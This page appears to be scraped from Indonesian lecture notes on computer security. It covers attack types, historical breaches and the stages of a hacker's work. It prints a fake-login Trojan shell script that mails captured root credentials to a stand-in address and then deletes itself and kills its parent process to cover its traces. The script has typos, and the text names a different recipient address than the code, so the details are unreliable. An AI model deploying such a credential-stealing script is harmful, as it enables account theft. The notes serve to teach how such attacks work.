• SECURITY BREACH ACCIDENT
  • MEMAHAMI HACKER BEKERJA
  • Diktat kuliah keamanan komputer pendahuluan




    Download 0.66 Mb.
    bet8/68
    Sana01.08.2021
    Hajmi0.66 Mb.
    #16461
    1   ...   4   5   6   7   8   9   10   11   ...   68
    Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).




    • Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.




    • Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer.


    SECURITY BREACH ACCIDENT




    1996

    U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan

    1996

    FBI National Computer Crimes Squad, Washington D.C., memperkirakan kejahatan komputer yang terdeteksi kurang dari 15%, dan hanya 10% dari angka itu yang dilaporkan

    1997

    Penelitian Deloitte Touch Tohmatsu menunjukkan bahwa dari 300 perusahaan di Australia, 37% (dua diantara lima) pernah mengalami masalah keamanan sistem komputernya.

    1996

    Inggris, NCC Information Security Breaches Survey menunjukkan bahwa kejahatan komputer menaik 200% dari tahun 1995 ke 1996. Kerugian rata-rata US $30.000 / insiden.

    1998

    FBI melaporkan bahwa kasus persidangan yang berhubungan

    dengan kejahatan komputer meroket 950% dari tahun 1996 ke

    tahun 1997, dengan penangkapan dari 4 ke 42, dan terbukti

    (convicted) di pengadilan naik 88% dari 16 ke 30 kasus.





    Dan lain-lain. Dapat dilihat di www.cert.org







    Contoh akibat dari jebolnya sistem keamanan, antara lain:


    1988

    Keamanan sistem mail sendmail dieksploitasi oleh Robert

    Tapan Morris sehingga melumpuhkan sistem Internet. Kegiatan

    ini dapat diklasifikasikan sebagai “denial of service attack”.

    Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morris

    dihukum (convicted) dan hanya didenda $10.000.


    10 Maret 1997

    Seorang hacker dari Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport local (Worcester, Massachusetts) sehingga mematikan komunikasi di control tower dan menghalau pesawat yang hendak mendarat.

    Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.



    http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv

    1990

    Kevin Poulsen mengambil alih system komputer telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local.

    1995

    Kevin Mitnick, mencuri 20.000 nomor kartu kredit, menyalin system operasi DEC secara illegal dan mengambil alih hubungan telpon di New York dan California.

    1995

    Vladimir Levin membobol bank-bank di kawasan Wallstreet, mengambil uang sebesar $10 juta.

    2000

    Fabian Clone menjebol situs aetna.co.id dan Jakarta mail dan membuat directory atas namanya berisi peringatan terhadap administrator situs tersebut.

    2000

    Beberapa web site Indonesia sudah dijebol dan daftarnya (beserta

    contoh halaman yang sudah dijebol) dapat dilihat di koleksi





    2000

    Wenas, membuat server sebuah ISP di singapura down



    MEMAHAMI HACKER BEKERJA

    Secara umum melalui tahapan-tahapan sebagai berikut :



      1. Tahap mencari tahu system komputer sasaran.

      2. Tahap penyusupan

      3. Tahap penjelajahan

      4. Tahap keluar dan menghilangkan jejak.

    Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :



    Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.

    "Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.

    Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii

    Nah sebenarnya apa sih yang terjadi ?

    Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

    #!/bin/sh

    ###################################

    # Nama program : my_login

    # Deskripsi :Program kuda trojan sederhana

    # versi 1.0 Nopember 1999

    ####################################

    COUNTER=0

    Cat /etc/issue

    While [ "$COUNTER" –ne 2 ]

    do

    let COUNTER=$COIUNTER+1



    echo "login: \c"

    read LOGIN

    stty echo

    echo "password: \c"

    read PASSWORD

    echo "User $LOGIN : $PASSWORD" | mail gadis@company.com

    stty echo

    echo


    echo "Login Incorrect"

    done


    rm $0

    kill –9 $PPID


    Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
    Login:

    Password:


    Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.

    Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan


    Login:root

    Password: ********

    Login Incorrect
    Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.

    Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!

    Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
    rm $0

    kill –9 $PPID


    yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
    Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.




    Download 0.66 Mb.
    1   ...   4   5   6   7   8   9   10   11   ...   68




    Download 0.66 Mb.

    Bosh sahifa
    Aloqalar

        Bosh sahifa



    Diktat kuliah keamanan komputer pendahuluan

    Download 0.66 Mb.